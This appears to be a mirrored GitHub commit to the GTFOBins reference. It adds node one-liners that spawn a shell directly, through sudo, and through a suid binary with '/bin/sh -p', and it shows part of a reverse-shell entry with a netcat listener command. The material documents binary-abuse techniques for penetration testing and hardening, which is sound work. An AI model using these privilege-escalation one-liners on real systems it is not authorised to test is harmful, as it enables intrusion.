mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-13 07:19:08 +01:00
Add node suid, sudo, and interactive
This commit is contained in:
parent
48787a0e8e
commit
af346441f2
@ -1,5 +1,14 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
|
exec-interactive:
|
||||||
|
- code: |
|
||||||
|
node -e 'require("child_process").spawn("/bin/sh", [], { stdio: [0, 1, 2]});'
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
sudo node -e 'require("child_process").spawn("/bin/sh", [], { stdio: [0, 1, 2]});'
|
||||||
|
suid-enabled:
|
||||||
|
- code: |
|
||||||
|
./node -e 'require("child_process").spawn("/bin/sh", [ "-p" ], { stdio: [0, 1, 2]});'
|
||||||
reverse-shell:
|
reverse-shell:
|
||||||
- description: Run `nc -l -p 12345` to receive the shell on the other end.
|
- description: Run `nc -l -p 12345` to receive the shell on the other end.
|
||||||
code: |
|
code: |
|
||||||
|
Loading…
Reference in New Issue
Block a user